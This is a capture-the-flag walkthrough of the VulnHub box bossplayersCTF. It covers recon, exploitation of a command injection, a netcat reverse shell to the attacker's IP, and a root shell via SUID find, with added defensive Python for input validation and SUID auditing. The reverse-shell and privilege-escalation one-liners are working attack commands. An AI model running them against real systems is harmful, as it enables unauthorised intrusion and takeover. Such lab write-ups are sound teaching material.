The walk-through of bossplayersCTF machine from VulnHub

Name: bossplayersCTF: 1
Date release: 28 Sep 2019
Author: Cuong Nguyen
Level: Easy!
You can download it from here!

[1] Information Gathering.

I used VirtualBox to open this machine.

Then I used nmap to find the machine's IP address with a ping sweep:
nmap -sn 192.168.1.0/24
The machine's IP was 192.168.1.109.

Then I scanned every port with nmap:
nmap -sV -A -p0-65535 192.168.1.109

There were two open ports: 22, running SSH, and 80, running HTTP.
So I went to http://192.168.1.109/ and found nothing!

Then I used gobuster to brute-force directories:
gobuster dir -u http://192.168.1.109/ -w /usr/share/dirb/wordlists/common.txt

When I visited http://192.168.1.109/robots.txt I found a base64-encoded string.

So I decoded it, and the result was

I thought I had missed something. Yes, I had forgotten to view the page source, so I viewed it, and there was a comment that looked like base64-encoded text.

After decoding it three times (each layer was base64 again) I found the name of a PHP file: workinginprogress.php.
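The comment had to be decoded layer by layer, and it is easy to over-decode and turn the final filename into garbage. The Python helper below is an added example, not part of the original write-up: it peels nested base64 automatically, decoding while the current value still looks like base64 and decodes to printable text, and stopping otherwise. wrap_base64 only builds a constructed sample (the filename from this box wrapped three times); the actual comment from the page is not reproduced here.

```python
import base64
import binascii
import re
from typing import Tuple

# Strict base64 alphabet with optional '=' padding; whitespace is stripped before the test.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(s: str) -> bool:
    """Cheap syntactic check: base64 alphabet only and a length that is a multiple of 4."""
    s = "".join(s.split())
    return bool(s) and len(s) % 4 == 0 and _B64_RE.match(s) is not None


def peel_base64(blob: str, max_layers: int = 10) -> Tuple[str, int]:
    """Repeatedly base64-decode `blob` while each layer decodes cleanly to printable text.

    Returns (innermost_text, layers_removed). Decoding stops as soon as the current
    value no longer looks like base64 or does not decode to printable UTF-8, so a
    plaintext filename such as 'workinginprogress.php' ('.' is outside the alphabet)
    is returned as-is instead of being mangled by one decode too many.
    """
    current = blob
    layers = 0
    while layers < max_layers and looks_like_base64(current):
        try:
            raw = base64.b64decode("".join(current.split()), validate=True)
            text = raw.decode("utf-8").strip()
        except (binascii.Error, UnicodeDecodeError):
            break  # not really base64, or binary payload: keep the previous layer
        if not text.isprintable():
            break
        current = text
        layers += 1
    return current, layers


def wrap_base64(text: str, layers: int) -> str:
    """Constructed sample builder: base64-encode `text` `layers` times, innermost first."""
    data = text.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


if __name__ == "__main__":
    sample = wrap_base64("workinginprogress.php", 3)  # constructed, mirrors the page's comment
    print(peel_base64(sample))  # ('workinginprogress.php', 3)
```

The printable-text check is deliberately conservative: a layer that decodes to bytes with control characters is treated as the end of the chain, which is the right default when the innermost payload might be binary rather than a filename.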

So I visited http://192.168.1.109/workinginprogress.php and found

It looks like a checklist, so I think we have two tasks to do. The first is testing the ping command, but how?
I brute-forced the parameter name of the PHP page with Burp Suite, and its name was cmd.

[2] Scanning for bugs.

What about typing another command?
I tried uname -a by giving the cmd parameter the value uname+-a, and the result was

Bingo! It's a command injection bug: whatever goes into cmd is handed to a shell on the server, so we can run arbitrary commands as the web server's user.
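The page does not show the server-side PHP, so the following Python is an added illustration and not the box's code. run_vulnerable mirrors the pattern that makes a ping checker injectable (the user-supplied target concatenated into a shell command string), and run_hardened is the fix: validate the target as an IP address or hostname, then pass it as a single argv element with no shell in between. echo stands in for ping -c 1 (an assumption, so the example runs with no network or raw-socket privileges); the payload and expected output are constructed.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of alphanumerics and '-', never starting with '-',
# so option injection ('-c 9999') is rejected along with shell metacharacters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*$")

# Assumption: 'echo' replaces 'ping -c 1' so the demo needs no network access.
STAND_IN_CMD = "echo"


def validate_target(target: str) -> str:
    """Accept an IP literal or a hostname; reject anything else (';', '|', '`', '$(', spaces...).

    Returns the validated string unchanged so callers can drop it straight into argv.
    """
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"refusing target {target!r}: not an IP address or hostname")


def run_vulnerable(target: str) -> str:
    """Same shape as PHP's shell_exec('ping -c 1 ' . $_GET['cmd']): concat, then a shell."""
    proc = subprocess.run(f"{STAND_IN_CMD} {target}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def run_hardened(target: str) -> str:
    """Fixed version: allow-list the input and exec argv directly, no shell parsing."""
    safe = validate_target(target)
    proc = subprocess.run([STAND_IN_CMD, safe], capture_output=True, text=True)
    return proc.stdout


def injected(output: str, marker: str) -> bool:
    """True if a line produced by the injected command shows up in the output."""
    return marker in output.splitlines()


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"  # constructed payload, same idea as '; uname -a'
    print("vulnerable ->", run_vulnerable(payload).rstrip())  # 127.0.0.1 then INJECTED
    try:
        run_hardened(payload)
    except ValueError as err:
        print("hardened   ->", err)
```

Escaping the string (escapeshellarg in PHP, shlex.quote in Python) is the weaker fix: it still routes the value through a shell and leaves option injection open. The argv form plus an allow-list removes the shell from the path entirely.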

[3] Exploiting.

I checked whether the nc tool was available on the target so I could make a reverse connection and get a reverse shell, and it was installed. (The -e option exists only in the traditional netcat build; the OpenBSD variant does not have it.)

So I listened on port 1337 on my machine with
nc -lvp 1337
and started the connection from the target with
nc -e /bin/bash 192.168.1.8 1337
The connection was established successfully.
Then I tried to get a proper shell by typing
python -c 'import pty;pty.spawn("/bin/bash");'
and I got it.

[4] Privilege escalation.

Now we have the permissions of the web server's user, but we need root to read the flag, so it's time for privilege escalation!

After some research I understood that privilege escalation here goes through a SUID executable, so I listed the files with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null

find was in the list. A SUID find runs with its owner's (root's) effective UID, and its -exec action runs any command we like, so I searched for ways to abuse it and got a root shell with
find . -exec /bin/bash -p \;
The -p flag matters: without it bash resets the effective UID to the real UID when they differ, and the new shell would come up unprivileged again.
Then I was able to read the flag. It was base64-encoded, so I decoded it, and it was Congratulations!
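Enumerating SUID files is the same check a defender should run regularly, so here is a Python version of the find one-liner as an added example (not from the original write-up): it walks a tree, reports regular files with the setuid bit, and flags the subset whose names are known shell-spawning primitives. The SHELL_CAPABLE list is partial and an assumption to adjust for your own environment; build_demo_tree makes a constructed fixture with a fake SUID find in a temporary directory, so the example never touches the real filesystem.

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Partial list of binaries that yield a shell (or an arbitrary root file write) when
# SUID-root, as seen in common privilege-escalation references. Assumption: extend
# it for whatever your own fleet ships.
SHELL_CAPABLE = {"find", "bash", "sh", "dash", "vim", "vi", "python", "python3",
                 "perl", "env", "nmap", "less", "more", "awk"}


def is_suid_regular(st_mode: int) -> bool:
    """True for a regular file (not a directory, symlink or device) with the setuid bit set."""
    return stat.S_ISREG(st_mode) and bool(st_mode & stat.S_ISUID)


def find_suid_files(root: str) -> List[str]:
    """Python equivalent of `find ROOT -perm -u=s -type f 2>/dev/null`.

    lstat judges symlinks by themselves and never follows them, and anything we
    cannot stat is skipped (the 2>/dev/null part) instead of aborting the walk.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid_regular(st.st_mode):
                hits.append(path)
    return sorted(hits)


def flag_shell_capable(paths: List[str]) -> List[str]:
    """Subset of SUID paths whose basename is a known shell-spawning primitive."""
    return [p for p in paths if os.path.basename(p) in SHELL_CAPABLE]


def build_demo_tree() -> Tuple[str, str, str]:
    """Constructed fixture: a temp dir holding a fake SUID 'find' and an ordinary 'ls'."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid = os.path.join(root, "usr", "bin", "find")
    plain = os.path.join(root, "usr", "bin", "ls")
    os.makedirs(os.path.dirname(suid))
    for path in (suid, plain):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # contents are irrelevant, only the mode bits matter
    os.chmod(suid, 0o4755)   # rwsr-xr-x: the setuid bit this audit looks for
    os.chmod(plain, 0o755)   # rwxr-xr-x: executable but not setuid
    return root, suid, plain


if __name__ == "__main__":
    root, _suid, _plain = build_demo_tree()
    found = find_suid_files(root)
    print("SUID files:", found)
    print("worth a closer look:", flag_shell_capable(found))
```

On a real host, run it against / and diff the output against a known-good baseline; a new entry, or a SUID bit on anything in SHELL_CAPABLE, is the finding that this box's privilege escalation depends on.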

Hope you learned something new, and you can find me on:
Facebook
Twitter
